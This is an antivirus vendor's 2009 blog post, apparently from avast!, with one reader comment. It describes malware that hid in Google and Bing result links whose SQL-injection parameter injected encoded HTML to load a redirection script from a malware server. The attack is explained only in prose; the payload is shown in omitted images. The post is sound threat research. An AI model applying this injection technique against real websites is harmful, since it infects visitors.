Protecting over 200 million PCs, Macs, & Mobiles – more than any other antivirus

June 18th, 2009

Google – new malware hosting

A new type of malware has been found today which uses the Google search engine database for hosting.  Werner Klier (virus researcher from GData) pointed us to one very puzzling result of Google search. This result was detected as malware with avast! from the beginning. It is however a very interesting approach from malware creators – using Google to host their malware. Here I’ll describe how this infection works (virus researchers from GData, Ralf Benzmüller and Armin Büscher, reached the same conclusion).

Next picture represents the result from Google as shown in the web browser. Details have been removed from the image – only the small part of the text is readable to show the beginning of the malicious link.

google_malformed_url

The whole link is shown in the next image. The most important part of this link is just after string “?ID=”. It is SQL command which is executed on the targeted PHP file. The only one condition for execute SQL command is the bug in the target document to allow so called ‘SQL injection’. The rest of the SQL command contains encoded html code which is then injected into the generated document. PHP code doesn’t contain any malicious script – malicious code is injected from Google’s link by clicking on it. This is the yet unseen approach I was talking in the beginning of this article.

google_malformed_url2

Next picture shows html code just after the injection – nothing is stored on the server, and the server version of the document is still clean. Injected code contains some keywords and a link to malware distribution server – everything needed for redirecting and infecting the target computer.

google_injected_code

Last decoded string from the previous image is the html command which loads redirection script from malware distribution server. If it is loaded by the browser then infection begins!

Behavior:

  • Uses most used search engine to host itself – malware is actualy stored as link to buggy website that allows SQL injection.
  • Buggy website is not affected, it is modified on the fly when user clicks on the link from Google.
  • It is  new approach to store malware in the internet – using search engine database.
  • Currently all the malicious url are removed from the Google database.
  • (Updated 18.6.2009 Evening) Microsotf’s bing is affected too and still offers malicious links.
  1. lorijryan
    June 22nd, 2009 at 22:38 | #1

    Thanks for the article….was directed to it via a link in the Avast! forum.

    The mechanism of how this infection works is beyond my understanding, but glad to see Avast! seems to once again be spot-on in it’s detection!

Comments are closed.